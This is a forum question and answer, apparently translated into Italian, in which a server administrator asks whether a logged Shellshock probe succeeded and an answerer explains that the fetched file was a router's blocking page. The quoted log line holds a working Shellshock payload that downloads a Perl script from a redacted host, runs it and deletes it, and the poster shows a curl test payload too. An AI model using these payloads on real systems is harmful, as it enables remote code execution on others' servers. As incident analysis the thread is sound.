Shellshock Exploit evidence: è un attacco riuscito

8

Stavo controllando i log oggi e ho notato quanto segue:

 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/bo.pl;chmod +x /tmp/bo.pl;perl /tmp/bo.pl;rm -rf /tmp/bo*\""

Come ho ben capito questo è un tentativo di analizzare la vulnerabilità shellshock. Ho recuperato il file caricato bo.pl - che conteneva il seguente ...

<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://192.168.1.1/blocking.asp?cat_id=78">
</head>
<body></body>
</html>

Ora, a quanto ho capito, questo sta usando la tecnica di aggiornamento per visualizzare una pagina blocking.asp di qualche tipo.

Sono positivo dato che prova che si trattava di un attacco malevolo. La cosa che mi preoccupa è il registro mostra 13501 per la lunghezza della risposta. Ma quando ho provato a usare l'intestazione shellshock semplice per testare l'abilità ...

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

Ho ricevuto solo la seguente voce di registro ...

71.121.200.199 - - [26/Dec/2016:18:14:11 -0100] "GET / HTTP/1.1" 200 22 "-" "() { :; }; /bin/eject"

Sono anche andato a controllare la directory / tmp e ho trovato due file che non corrispondono esattamente all'ora sui log ma sembrano sospetti visto che si tratta di un server headless e questi sembrano essere collegati a servizi desktop remoti di qualche tipo.

-rw-r--r--  1 0 0    8 Dec 25 03:46 httpd_lua_shm.2693
drwxrwxrwt  2 0 0 4096 Dec 24 18:42 .ICE-unix

Quindi la mia domanda è - questo sembra essere un attacco di successo a causa del fatto che i byte nella risposta sono così grandi? C'è qualche altra cosa che dovrei controllare oltre alla cronologia di bash e tale da cercare degli indizi su cosa è successo?

    
posta Twenty Five 27.12.2016 - 02:36
fonte

1 risposta

1

Now as I understand it this is using the refresh technique to display a blocking.asp page of some sort.

La pagina che è stata restituita quando hai richiesto il link è una pagina di blocco pubblicata dal tuo Asus WRT: link

["Home Protection", "78", "Malicious site blocked", "", "Sites used by malicious programs, including sites used to host upgrades or store stolen information."]

Il bo.pl avrebbe dovuto essere uno script perl. L'attacco ha tentato di scaricarlo ed eseguirlo, quindi rimuoverlo dal sistema. Se disponi di log di esecuzione del sistema, dovresti riuscire a vedere se è stato eseguito.

Cerca di fare la stessa cosa sul tuo server. L'unica differenza che vedo nella tua richiesta è la versione HTTP utilizzata (1 vs 1.1), quindi potrebbe essere stata pubblicata una quantità diversa di byte.

    
risposta data 03.08.2017 - 15:08
fonte

Leggi altre domande sui tag